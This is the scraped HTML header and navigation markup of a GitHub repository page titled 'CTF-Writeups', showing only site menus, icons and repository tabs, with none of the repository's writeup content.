<header class="Header-old header-logged-out js-details-container Details position-relative f4 py-2" role="banner"> <div class="container-xl d-lg-flex flex-items-center p-responsive"> <div class="d-flex flex-justify-between flex-items-center"> <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github color-text-white"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg>
<div class="d-lg-none css-truncate css-truncate-target width-fit p-2">
</div>
<div class="d-flex flex-items-center"> Sign up
<button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link d-lg-none mt-1"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars color-text-white"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path></svg>
</button> </div> </div>
<div class="HeaderMenu HeaderMenu--logged-out position-fixed top-0 right-0 bottom-0 height-fit position-lg-relative d-lg-flex flex-justify-between flex-items-center flex-auto"> <div class="d-flex d-lg-none flex-justify-end border-bottom color-bg-subtle p-3"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-x color-icon-secondary"> <path fill-rule="evenodd" d="M5.72 5.72a.75.75 0 011.06 0L12 10.94l5.22-5.22a.75.75 0 111.06 1.06L13.06 12l5.22 5.22a.75.75 0 11-1.06 1.06L12 13.06l-5.22 5.22a.75.75 0 01-1.06-1.06L10.94 12 5.72 6.78a.75.75 0 010-1.06z"></path></svg>
</button> </div>
<nav class="mt-0 px-3 px-lg-0 mb-5 mb-lg-0" aria-label="Global"> <details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Why GitHub? <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary> <div class="dropdown-menu flex-auto rounded px-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Features <span>→</span>
Mobile <span>→</span> Actions <span>→</span> Codespaces <span>→</span> Packages <span>→</span> Security <span>→</span> Code review <span>→</span> Issues <span>→</span> Integrations <span>→</span>
GitHub Sponsors <span>→</span> Customer stories<span>→</span> </div> </details> Team Enterprise
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Explore <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-0 mt-0 pb-4 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Explore GitHub <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Learn and contribute</h4> Topics <span>→</span> Collections <span>→</span> Trending <span>→</span> Learning Lab <span>→</span> Open source guides <span>→</span>
<h4 class="color-fg-muted text-normal text-mono f5 mb-2 border-lg-top pt-lg-3">Connect with others</h4> The ReadME Project <span>→</span> Events <span>→</span> Community forum <span>→</span> GitHub Education <span>→</span> GitHub Stars program <span>→</span> </div> </details>
Marketplace
<details class="HeaderMenu-details details-overlay details-reset width-full"> <summary class="HeaderMenu-summary HeaderMenu-link px-0 py-3 border-0 no-wrap d-block d-lg-inline-block"> Pricing <svg x="0px" y="0px" viewBox="0 0 14 8" xml:space="preserve" fill="none" class="icon-chevon-down-mktg position-absolute position-lg-relative"> <path d="M1,1l6.2,6L13,1"></path> </svg> </summary>
<div class="dropdown-menu flex-auto rounded px-0 pt-2 pb-4 mt-0 p-lg-4 position-relative position-lg-absolute left-0 left-lg-n4"> Plans <span>→</span>
Compare plans <span>→</span> Contact Sales <span>→</span>
Education <span>→</span> </div> </details> </nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-3 mb-lg-0">
<div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="391709258" data-scoped-search-url="/0xM4hm0ud/CTF-Writeups/search" data-owner-scoped-search-url="/users/0xM4hm0ud/search" data-unscoped-search-url="/search" action="/0xM4hm0ud/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="bUuDxUDrqWFiVq7UFIHML0tCVPKSwHnIrY3wNIxvmyxy61M9Gb1BuRWTXyjIH7MbscHyboCJsCeBkGLqyEzVoQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-3 mb-4 mb-lg-0 d-inline-block"> Sign in </div>
Sign up </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div data-pjax-replace id="js-flash-container">
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class=" px-2" > <button class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div>{{ message }}</div>
</div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" data-pjax-container >
<div id="repository-container-header" class="pt-3 hide-full-screen mb-5" style="background-color: var(--color-page-header-bg);" data-pjax-replace>
<div class="d-flex mb-3 px-3 px-md-4 px-lg-5">
<div class="flex-auto min-width-0 width-fit mr-3"> <h1 class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-icon-secondary mr-2"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path></svg> <span> 0xM4hm0ud </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span></h1>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell"> <path d="M8 16a2 2 0 001.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 008 16z"></path><path fill-rule="evenodd" d="M8 1.5A3.5 3.5 0 004.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.018.018 0 00-.003.01l.001.006c0 .002.002.004.004.006a.017.017 0 00.006.004l.007.001h10.964l.007-.001a.016.016 0 00.006-.004.016.016 0 00.004-.006l.001-.007a.017.017 0 00-.003-.01l-1.703-2.554a1.75 1.75 0 01-.294-.97V5A3.5 3.5 0 008 1.5zM3 5a5 5 0 0110 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.518 1.518 0 0113.482 13H2.518a1.518 1.518 0 01-1.263-2.36l1.703-2.554A.25.25 0 003 7.947V5z"></path></svg> Notifications
<div > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom mr-1"> <path fill-rule="evenodd" d="M8 .25a.75.75 0 01.673.418l1.882 3.815 4.21.612a.75.75 0 01.416 1.279l-3.046 2.97.719 4.192a.75.75 0 01-1.088.791L8 12.347l-3.766 1.98a.75.75 0 01-1.088-.79l.72-4.194L.818 6.374a.75.75 0 01.416-1.28l4.21-.611L7.327.668A.75.75 0 018 .25zm0 2.445L6.615 5.5a.75.75 0 01-.564.41l-3.097.45 2.24 2.184a.75.75 0 01.216.664l-.528 3.084 2.769-1.456a.75.75 0 01.698 0l2.77 1.456-.53-3.084a.75.75 0 01.216-.664l2.24-2.183-3.096-.45a.75.75 0 01-.564-.41L8 2.694v.001z"></path></svg> <span> Star</span>
3 </div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked"> <path fill-rule="evenodd" d="M5 3.25a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm0 2.122a2.25 2.25 0 10-1.5 0v.878A2.25 2.25 0 005.75 8.5h1.5v2.128a2.251 2.251 0 101.5 0V8.5h1.5a2.25 2.25 0 002.25-2.25v-.878a2.25 2.25 0 10-1.5 0v.878a.75.75 0 01-.75.75h-4.5A.75.75 0 015 6.25v-.878zm3.75 7.378a.75.75 0 11-1.5 0 .75.75 0 011.5 0zm3-8.75a.75.75 0 100-1.5.75.75 0 000 1.5z"></path></svg> Fork
0
</div>
<div id="responsive-meta-container" data-pjax-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path><path fill-rule="evenodd" d="M8 0a8 8 0 100 16A8 8 0 008 0zM1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.177 3.073L9.573.677A.25.25 0 0110 .854v4.792a.25.25 0 01-.427.177L7.177 3.427a.25.25 0 010-.354zM3.75 2.5a.75.75 0 100 1.5.75.75 0 000-1.5zm-2.25.75a2.25 2.25 0 113 2.122v5.256a2.251 2.251 0 11-1.5 0V5.372A2.25 2.25 0 011.5 3.25zM11 2.5h-1V4h1a1 1 0 011 1v5.628a2.251 2.251 0 101.5 0V5A2.5 2.5 0 0011 2.5zm1 10.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0zM3.75 12a.75.75 0 100 1.5.75.75 0 000-1.5z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 8a6.5 6.5 0 1113 0 6.5 6.5 0 01-13 0zM8 0a8 8 0 100 16A8 8 0 008 0zM6.379 5.227A.25.25 0 006 5.442v5.117a.25.25 0 00.379.214l4.264-2.559a.25.25 0 000-.428L6.379 5.227z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-book UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M0 1.75A.75.75 0 01.75 1h4.253c1.227 0 2.317.59 3 1.501A3.744 3.744 0 0111.006 1h4.245a.75.75 0 01.75.75v10.5a.75.75 0 01-.75.75h-4.507a2.25 2.25 0 00-1.591.659l-.622.621a.75.75 0 01-1.06 0l-.622-.621A2.25 2.25 0 005.258 13H.75a.75.75 0 01-.75-.75V1.75zm8.755 3a2.25 2.25 0 012.25-2.25H14.5v9h-3.757c-.71 0-1.4.201-1.992.572l.004-7.322zm-1.504 7.324l.004-5.073-.002-2.253A2.25 2.25 0 005.003 2.5H1.5v9h3.757a3.75 3.75 0 011.994.574z"></path></svg> <span>Wiki</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M7.467.133a1.75 1.75 0 011.066 0l5.25 1.68A1.75 1.75 0 0115 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.7 1.7 0 01-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 011.217-1.667l5.25-1.68zm.61 1.429a.25.25 0 00-.153 0l-5.25 1.68a.25.25 0 00-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.2.2 0 00.154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.25.25 0 00-.174-.237l-5.25-1.68zM9 10.5a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.75a.75.75 0 10-1.5 0v3a.75.75 0 001.5 0v-3z"></path></svg> <span>Security</span> <include-fragment src="/0xM4hm0ud/CTF-Writeups/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path fill-rule="evenodd" d="M1.5 1.75a.75.75 0 00-1.5 0v12.5c0 .414.336.75.75.75h14.5a.75.75 0 000-1.5H1.5V1.75zm14.28 2.53a.75.75 0 00-1.06-1.06L10 7.94 7.53 5.47a.75.75 0 00-1.06 0L3.22 8.72a.75.75 0 001.06 1.06L7 7.06l2.47 2.47a.75.75 0 001.06 0l5.25-5.25z"></path></svg> <span>Insights</span> <span></span>
